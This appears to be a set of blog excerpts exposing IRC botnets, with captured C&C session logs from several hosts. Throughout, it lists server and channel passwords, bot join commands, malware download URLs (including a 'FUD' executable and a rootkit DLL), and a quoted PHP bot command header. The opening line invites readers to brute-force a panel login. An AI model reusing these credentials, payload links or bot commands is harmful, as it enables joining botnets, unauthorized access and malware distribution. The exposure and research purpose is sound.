This is another contribution from our anonymous friend. The sample here, http://dl.dropbox.com/u/73806662/testandro.exe, connects to img196-imageshack.us/pannel/image.php. To have access to this panel you need user:passwd here: imageshack.us/pannel/ (feel free to brute it 🙂). From the VirusTotal scan, the file testandro.exe appears to be FUD. There is another file downloaded, dl.dropbox.com/u/76205929/rk.cmd.dll, which from the name looks like rootkit ...
jers1.info (ngrBot hosted in Peru Datos)
Resolved : [jers1.info] To [208.83.233.195]
C&C Server: 208.83.233.195:1889
Server Password:
Username: wbunlkj
Nickname: n{DE|XPa}wbunlkj
Channel: #cpx (Password: nuifkr)
Channeltopic: :~pu http://hotfile.com/dl/154232487/a95dd91/27abril.exe 4ad089d45ca43ecc9d99e93215e03f6f ~s -o ~s
Downloaded URLs: http://199.7.177.220/dl/154232490/3b415ce/jhgfrrr.exe (hotfile.com)
Hosting info: http://whois.domaintools.com/208.83.233.195
3.aa.am (ngrBot hosted in Netherlands Amsterdam Ecatel Ltd)
Resolved : [3.aa.am] To [80.82.66.234]
Remote Host Port Number
3.aa.am 9835
Local users: Current Local Users: 710 Max: 1954
Global users: Current Global Users: 710 Max: 1954
NICK {US|XPa|x86}cxtrpuo
USER {US|XPa|x86}cxtrpuo 0 0 :{US|XPa|x86}cxtrpuo
JOIN #new
JOIN #bull
Now talking in #new
Modes On: [ #new ] [ +sntl 75 ]
Joins: {DE|W7a|x86}hssdpli [~DEW7ax8@nig-6B825AA6.superkabel.de]
hosting ...
94.23.98.55 (linux bots hosted in Spain Madrid Ovh Systems)
The bot used by heckers:
<?
/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns ...
128.204.202.111 (ngrBot hosted in Netherlands Amsterdam Snel Internet Services B.v)
Remote Host Port Number
128.204.202.111 6667 PASS nopw
NICK n{US|XPa}ubnrkxy
USER ubnrkxy 0 0 :ubnrkxy
PONG :92C7705D
JOIN #ngr# ngrBot
{NL|W7p}psvawzp) !v
Quits: {NL|W7p}psvawzp [net-217320@E4422491.8D3F578B.324BA75E.IP] (User has been permanently banned from Codeleak (gtfo.))
lol, sniffers already in
The hecker running this net (boing7898@rox-F8ED71C3.ip61.fastwebnet.it):
Boing * ~#ngr# #codeleak * irc.codeleak.com :Codeleak’s IRC * is away (Playing ...
122mb samples for analysing purposes
This package contains 122mb of samples. Inside you have different IRC bot samples (insomnia uncrypted), banking trojans, worms etc. Only for analysing purposes.
nbot.no-ip.biz (Aryan Bot hosted in Mexico Television Internacional S.a. De C.v)
Resolved : [nbot.no-ip.biz] To [187.161.215.20]
Remote Host Port Number
187.161.215.20 6667
Local users: Current Local Users: 74 Max: 115
Global users: Current Global Users: 74 Max: 90
JOIN #bots none
NICK New{US-XP-x86}7358801
USER 7358801 "" "7358801" :7358801
MODE New{US-XP-x86}7358801 +iMm
PONG :4D23E0D9
PONG :nbot.no-ip.biz
Now talking in #bots
Modes On: [ #bots 12] [ + ...
gigasphere.su (irc botnet hosted in United States Baltimore Gandi Us Inc)
Same hecker Burimi from here: http://www.exposedbotnets.com/2012/03/217160224132irc-botnet-hosted-in.html
Resolved : [gigasphere.su] To [61.31.99.67]
Resolved : [gigasphere.su] To [82.165.135.196]
Resolved : [gigasphere.su] To [173.246.102.122]
Remote Host Port Number
61.31.99.67 4042 PASS ngrBot
61.31.99.67 1863 PASS ngrBot
other ports used for ircd: 81,3333,1234,33333
NICK new[USA|XP|COMPUTERNAME]eejxdfy
USER xd "" "lol" :xd
Channels:
Now talking in #boss
Topic On: [ #boss ...
f.maqder.info (irc botnet hosted in United States Dallas Theplanet.com Internet Services Inc)
Resolved : [f.maqder.info] To [174.123.76.49]
Remote Host Port Number
174.123.76.49 1863 PASS ..
NICK SB-USA-XP-GgmPsYRi
USER SB-USA-XP-GgmPsYRi 0 * f.maqder.info :SB-USA-XP-GgmPsYRi
JOIN #sly ss
Sample: the sample is a .jpg, so don't open the URL in your browser, and use VMware.
Hosting info: http://whois.domaintools.com/174.123.76.49
fasharlz.com (ngrBot hosted in United States Denver Wbs Connect)
Resolved : [fasharlz.com] To [8.33.7.91]
Remote Host Port Number
174.140.174.50 80
199.15.234.7 80
62.149.142.23 80
8.33.7.91 8879 PASS secret
NICK n{US|XPa}wjipllb
USER wjipllb 0 0 :wjipllb
JOIN #ircp secret
PRIVMSG #ircp :[d="http://www.lazynews.net/fashashogun.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
PRIVMSG #ircp :[DNS]: Blocked 0 domain(s) - Redirected 8 domain(s) ...